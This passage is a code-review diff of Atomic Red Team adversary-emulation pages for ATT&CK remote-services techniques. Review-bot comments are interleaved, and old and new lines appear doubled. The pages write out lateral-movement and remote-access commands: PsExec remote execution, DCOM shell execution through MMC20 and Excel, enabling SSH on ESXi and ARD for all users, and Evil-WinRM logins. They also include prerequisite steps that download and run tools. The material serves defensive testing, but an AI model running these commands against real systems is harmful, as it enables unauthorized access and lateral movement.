## Atomic Test #3 - Copy and Execute File with PsExec
Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
**Supported Platforms:** Windows
**auto_generated_guid:** `0eb03d41-79e4-4393-8e57-6344856be1cf`
#### Inputs
**auto_generated_guid:** 0eb03d41-79e4-4393-8e57-6344856be1cf
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_path | File to copy and execute | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
| remote_host | Remote computer to receive the copy and execute the file | string | &#92;&#92;localhost|
| psexec_exe | Path to PsExec | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;PsExec.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
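Review bot: The Get Prereq Commands for Atomic Test #3 fetch `PSTools.zip` with `Invoke-WebRequest` and copy `PsExec.exe` into place with no integrity check, so whatever the download endpoint returns is what later runs as an elevated service on `remote_host`. Record the expected `Get-FileHash -Algorithm SHA256` value of the archive (a placeholder until it has been measured) and make the prereq exit non-zero when the hash does not match, so a tampered or substituted download is caught before the attack step.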
@@ -105,25 +139,42 @@ New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "#{psexec_exe}" -Force
```
### Atomic Test #4: Execute command writing output to local Admin Share
<br/>
<br/>
## Atomic Test #4 - Execute command writing output to local Admin Share
Executes a command, writing the output to a local Admin Share.
This technique is used by post-exploitation frameworks.
**Supported Platforms:** Windows
**auto_generated_guid:** `d41aaab5-bdfe-431d-a3d5-c29e9136ff46`
#### Inputs
**auto_generated_guid:** d41aaab5-bdfe-431d-a3d5-c29e9136ff46
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Remote computer to receive the copy and execute the file | string | output.txt|
| command_to_execute | Command to execute for output. | string | hostname|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
```
<br/>
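Review bot: The `output_file` input description in Atomic Test #4 (`Remote computer to receive the copy and execute the file`) is carried over from the PsExec test above and does not describe this parameter; it should read along the lines of `Name of the file written to the local ADMIN$ share`. Since this markdown is generated, the fix belongs in the technique's YAML so the next conversion run does not reintroduce it.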
+50 -28
View File
@@ -1,24 +1,27 @@
# T1021.003 - Remote Services: Distributed Component Object Model
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/003)
<blockquote>
## Description from ATT&CK
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
>
> The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
>
> Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
>
> Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)
The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
[Source](https://attack.mitre.org/techniques/T1021/003)
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)
</blockquote>
## Atomic Tests
- [Atomic Test #1: PowerShell Lateral Movement using MMC20](#atomic-test-1-powershell-lateral-movement-using-mmc20)
- [Atomic Test #2: PowerShell Lateral Movement Using Excel Application Object](#atomic-test-2-powershell-lateral-movement-using-excel-application-object)
- [Atomic Test #1 - PowerShell Lateral Movement using MMC20](#atomic-test-1---powershell-lateral-movement-using-mmc20)
### Atomic Test #1: PowerShell Lateral Movement using MMC20
- [Atomic Test #2 - PowerShell Lateral Movement Using Excel Application Object](#atomic-test-2---powershell-lateral-movement-using-excel-application-object)
<br/>
## Atomic Test #1 - PowerShell Lateral Movement using MMC20
Powershell lateral movement using the mmc20 application com object.
Reference:
@@ -29,22 +32,35 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
**Supported Platforms:** Windows
**auto_generated_guid:** `6dc74eb1-c9d6-4c53-b3b5-6f50ae339673`
#### Inputs
**auto_generated_guid:** 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of Computer | string | localhost|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```
### Atomic Test #2: PowerShell Lateral Movement Using Excel Application Object
<br/>
<br/>
## Atomic Test #2 - PowerShell Lateral Movement Using Excel Application Object
Powershell lateral movement using the Excel COM objects.
Reference:
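Review bot: Atomic Test #1 spawns `calc.exe` on `computer_name` through the MMC20 DCOM object but has no Cleanup Commands section, so the calculator process is left running on the target after every run; add a cleanup step that stops the spawned process (for the default `localhost` run, `Stop-Process -Name calc* -ErrorAction Ignore`) so repeated executions do not accumulate processes on the host.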
@@ -55,16 +71,22 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
**Supported Platforms:** Windows
**auto_generated_guid:** `505f24be-1c11-4694-b614-e01ae1cd2570`
#### Inputs
**auto_generated_guid:** 505f24be-1c11-4694-b614-e01ae1cd2570
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Hostname or IP | string | localhost|
| user | Name of user | string | admin|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
@@ -72,18 +94,16 @@ $com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Appli
$com.ActivateMicrosoftApp("5")
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Microsoft Excel must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
try {
New-Object -COMObject "Excel.Application" | Out-Null
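Review bot: The cleanup for Atomic Test #2 deletes the staged `foxprow.exe` but never releases the Excel COM server created by `[System.Activator]::CreateInstance` in the hunk header, so an `EXCEL.EXE` instance can remain resident after the test, and `Remove-Item` may fail if the copied binary is still in use. The cleanup runs in a separate session where `$com` is not available, so stop the processes explicitly (`Stop-Process -Name EXCEL, foxprow -ErrorAction Ignore`) before the `Remove-Item`.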
@@ -91,10 +111,12 @@ try {
exit 0
} catch { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
```
<br/>
+49 -33
View File
@@ -1,35 +1,44 @@
# T1021.004 - Remote Services: SSH
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/004)
<blockquote>
## Description from ATT&CK
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
>
> SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. On ESXi, SSH can be enabled either directly on the host (e.g., via `vim-cmd hostsvc/enable_ssh`) or via vCenter.(Citation: Sygnia ESXi Ransomware 2025)(Citation: TrendMicro ESXI Ransomware)(Citation: Sygnia Abyss Locker 2025) The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the users public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user (i.e., [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004)).
SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. On ESXi, SSH can be enabled either directly on the host (e.g., via `vim-cmd hostsvc/enable_ssh`) or via vCenter.(Citation: Sygnia ESXi Ransomware 2025)(Citation: TrendMicro ESXI Ransomware)(Citation: Sygnia Abyss Locker 2025) The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the users public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user (i.e., [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004)).
[Source](https://attack.mitre.org/techniques/T1021/004)
</blockquote>
## Atomic Tests
- [Atomic Test #1: ESXi - Enable SSH via PowerCLI](#atomic-test-1-esxi---enable-ssh-via-powercli)
- [Atomic Test #2: ESXi - Enable SSH via VIM-CMD](#atomic-test-2-esxi---enable-ssh-via-vim-cmd)
- [Atomic Test #1 - ESXi - Enable SSH via PowerCLI](#atomic-test-1---esxi---enable-ssh-via-powercli)
### Atomic Test #1: ESXi - Enable SSH via PowerCLI
- [Atomic Test #2 - ESXi - Enable SSH via VIM-CMD](#atomic-test-2---esxi---enable-ssh-via-vim-cmd)
<br/>
## Atomic Test #1 - ESXi - Enable SSH via PowerCLI
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
**Supported Platforms:** Windows
**auto_generated_guid:** `8f6c14d1-f13d-4616-b7fc-98cc69fe56ec`
#### Inputs
**auto_generated_guid:** 8f6c14d1-f13d-4616-b7fc-98cc69fe56ec
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
| vm_user | Specify the privilege user account on ESXi Server | string | root|
| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
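Review bot: `Set-PowerCLIConfiguration -InvalidCertificateAction Ignore` in Atomic Test #1 switches off certificate validation for subsequent PowerCLI connections, and because the call has no `-Scope Session` the setting can persist for the user beyond the test; neither the attack nor the cleanup restores it. Scope it to the session or reset it afterwards. The description also has two wording slips to fix in the source YAML: `a ESXi host` and `carryout`.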
@@ -37,42 +46,47 @@ Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Stop-VMHostService -Confirm:$false
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Check if VMWARE PowerCLI PowerShell Module is installed.
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
if (-not $RequiredModule) {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Install-Module -Name VMware.PowerCLI
```
### Atomic Test #2: ESXi - Enable SSH via VIM-CMD
<br/>
<br/>
## Atomic Test #2 - ESXi - Enable SSH via VIM-CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
**Supported Platforms:** Windows
**auto_generated_guid:** `280812c8-4dae-43e9-a74e-1d08ab997c0e`
#### Inputs
**auto_generated_guid:** 280812c8-4dae-43e9-a74e-1d08ab997c0e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vm_host | Specify the host name or IP of the ESXi server. | string | atomic.local|
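Review bot: The Get Prereq command `Install-Module -Name VMware.PowerCLI` has no `-Force` (or `-Scope CurrentUser`), so on a host where PSGallery is untrusted it stops at an interactive confirmation prompt and a non-interactive executor run never completes; `Install-Module -Name VMware.PowerCLI -Scope CurrentUser -Force` installs without prompting and without requiring an elevated session. Also `creeate` in the Test #2 description is a typo to fix in the YAML.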
@@ -80,32 +94,34 @@ An adversary enables SSH on an ESXi host to maintain persistence and creeate ano
| vm_pass | Specify the privileged user's password. | string | password|
| plink_file | Path to Plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/disable_ssh"
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Check if we have plink
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
```
<br/>
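Review bot: `plink -batch` abandons the connection without prompting when the host key of `vm_host` is not already in the local cache, so on a fresh runner both the attack and the cleanup command fail before `vim-cmd` is ever sent. Supply the expected key with `-hostkey <fingerprint>` (the value must come from the lab host, not be invented), which also pins the ESXi host identity instead of trusting whatever answers on that name. On a second point, the Get Prereq downloads `plink.exe` from `the.earth.li` straight into the payloads folder with no checksum check; compare `Get-FileHash` against a recorded value before the binary is used.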
+27 -13
View File
@@ -1,21 +1,23 @@
# T1021.005 - Remote Services:VNC
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/005)
<blockquote>
## Description from ATT&CK
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computers display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computers display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
>
> VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)
>
> Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)
VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)
[Source](https://attack.mitre.org/techniques/T1021/005)
Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Enable Apple Remote Desktop Agent](#atomic-test-1-enable-apple-remote-desktop-agent)
- [Atomic Test #1 - Enable Apple Remote Desktop Agent](#atomic-test-1---enable-apple-remote-desktop-agent)
### Atomic Test #1: Enable Apple Remote Desktop Agent
<br/>
## Atomic Test #1 - Enable Apple Remote Desktop Agent
ARD leverages a blend of protocols, including VNC to send the screen and control buffers and SSH for secure file transfer.
Adversaries can abuse ARD to gain remote code execution and perform lateral movement.
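Review bot: The title `# T1021.005 - Remote Services:VNC` is missing the space after the colon that every other technique heading in this changeset has (`Remote Services: SSH`, `Remote Services: Windows Remote Management`); since the heading is generated from the technique name, fix the name at the source so the converter emits `Remote Services: VNC`.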
@@ -23,16 +25,28 @@ References: https://www.mandiant.com/resources/blog/leveraging-apple-remote-des
**Supported Platforms:** macOS
**auto_generated_guid:** `8a930abe-841c-4d4f-a877-72e9fe90b9ea`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 8a930abe-841c-4d4f-a877-72e9fe90b9ea
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -allowAccessFor -allUsers -privs -all -quiet
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate -stop -configure -privs -none -quiet
```
<br/>
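Review bot: The cleanup for the ARD test deactivates the agent and sets `-privs -none`, but it does not undo the `-allowAccessFor -allUsers` that the attack command applied, so a host that previously restricted Remote Management to specific accounts comes back with all users allowed the next time the service is enabled; add `-allowAccessFor -specifiedUsers` to the cleanup `kickstart` invocation (or capture and restore the prior setting) so the test is fully reversible.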
+67 -34
View File
@@ -1,110 +1,143 @@
# T1021.006 - Remote Services: Windows Remote Management
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/006)
<blockquote>
## Description from ATT&CK
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
>
> WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)
WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)
[Source](https://attack.mitre.org/techniques/T1021/006)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Enable Windows Remote Management](#atomic-test-1-enable-windows-remote-management)
- [Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command](#atomic-test-2-remote-code-execution-with-ps-credentials-using-invoke-command)
- [Atomic Test #3: WinRM Access with Evil-WinRM](#atomic-test-3-winrm-access-with-evil-winrm)
- [Atomic Test #1 - Enable Windows Remote Management](#atomic-test-1---enable-windows-remote-management)
### Atomic Test #1: Enable Windows Remote Management
- [Atomic Test #2 - Remote Code Execution with PS Credentials Using Invoke-Command](#atomic-test-2---remote-code-execution-with-ps-credentials-using-invoke-command)
- [Atomic Test #3 - WinRM Access with Evil-WinRM](#atomic-test-3---winrm-access-with-evil-winrm)
<br/>
## Atomic Test #1 - Enable Windows Remote Management
Powershell Enable WinRM
Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
**Supported Platforms:** Windows
**auto_generated_guid:** `9059e8de-3d7d-4954-a322-46161880b9cf`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 9059e8de-3d7d-4954-a322-46161880b9cf
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Enable-PSRemoting -Force
```
### Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command
<br/>
<br/>
## Atomic Test #2 - Remote Code Execution with PS Credentials Using Invoke-Command
Simulate lateral movement with PowerShell Remoting on the local host.
Upon successful execution, PowerShell will execute `whoami` using `Invoke-Command`, targeting the
local machine as remote target.
**Supported Platforms:** Windows
**auto_generated_guid:** `5295bd61-bd7e-4744-9d52-85962a4cf2d6`
#### Attack Commands: Run with `powershell`!
**auto_generated_guid:** 5295bd61-bd7e-4744-9d52-85962a4cf2d6
#### Attack Commands: Run with `powershell`!
```powershell
Enable-PSRemoting -Force
Invoke-Command -ComputerName $env:COMPUTERNAME -ScriptBlock {whoami}
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Disable-PSRemoting -Force
```
### Atomic Test #3: WinRM Access with Evil-WinRM
<br/>
<br/>
## Atomic Test #3 - WinRM Access with Evil-WinRM
An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled
**Supported Platforms:** Windows
**auto_generated_guid:** `efe86d95-44c4-4509-ae42-7bfd9d1f5b3d`
#### Inputs
**auto_generated_guid:** efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | string | Domain&#92;Administrator|
| destination_address | Remote Host IP or Hostname | string | Target|
| password | Password | string | P@ssw0rd1|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
evil-winrm -i #{destination_address} -u #{user_name} -p #{password}
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Computer must have Ruby Installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
try {if (ruby -v) {exit 0} else {exit 1}} catch {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\rubyinstaller-2.7.1-1-x64.exe" https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-2.7.1-1/rubyinstaller-2.7.1-1-x64.exe
$file1= "PathToAtomicsFolder\..\ExternalPayloads\rubyinstaller-2.7.1-1-x64.exe"
Start-Process $file1 /S;
```
##### Description: Computer must have Evil-WinRM installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
try {if (evil-winrm -h) {exit 0} else {exit 1}} catch {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
gem install evil-winrm
```
<br/>
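Review bot: Atomic Test #1 enables PS remoting with `Enable-PSRemoting -Force` but has no Cleanup Commands section, whereas Test #2 restores the host with `Disable-PSRemoting -Force`; adding the same cleanup to Test #1 would stop a test run from leaving the WinRM listener and its firewall exception enabled on the host. In the Ruby prerequisite for Test #3, `Start-Process $file1 /S;` returns as soon as the installer is launched, so the following dependency step `gem install evil-winrm` can run before Ruby has finished installing and before `ruby`/`gem` are on PATH; `Start-Process $file1 -ArgumentList '/S' -Wait` makes the ordering deterministic (a fresh shell may still be needed to pick up the PATH change).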
+24 -9
@@ -1,19 +1,21 @@
# T1025 - Data from Removable Media
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1025)
<blockquote>
## Description from ATT&CK
Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.
> Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.
>
> Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.
Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.
[Source](https://attack.mitre.org/techniques/T1025)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Identify Documents on USB and Removable Media via PowerShell](#atomic-test-1-identify-documents-on-usb-and-removable-media-via-powershell)
- [Atomic Test #1 - Identify Documents on USB and Removable Media via PowerShell](#atomic-test-1---identify-documents-on-usb-and-removable-media-via-powershell)
### Atomic Test #1: Identify Documents on USB and Removable Media via PowerShell
<br/>
## Atomic Test #1 - Identify Documents on USB and Removable Media via PowerShell
This test simulates an attack where PowerShell is used to detect connected USB or other removable storage devices and gather a list of specific document files
(e.g., .docx, .xls, .txt, .pdf). The command works by first identifying removable drives on the system and then recursively searching through each one for files
matching the targeted extensions. If no removable drives are present, the script will return a message stating that no media is detected. This behavior mimics
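Review bot: both heading conventions appear in this hunk (`### Atomic Test #1: …` with anchor `#atomic-test-1-identify-…`, and `## Atomic Test #1 - …` with anchor `#atomic-test-1---identify-…`); each anchor only resolves against its own heading form, so the TOC entry and the heading must be switched together, and the same goes for the `auto_generated_guid` line with and without backticks. Whichever form is kept, it should be the same across all the converted technique files in this commit.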
@@ -21,11 +23,24 @@ how adversaries might scan for sensitive documents on removable devices for exfi
**Supported Platforms:** Windows
**auto_generated_guid:** `0b29f7e3-a050-44b7-bf05-9fb86af1ec2e`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 0b29f7e3-a050-44b7-bf05-9fb86af1ec2e
#### Attack Commands: Run with `command_prompt`!
```cmd
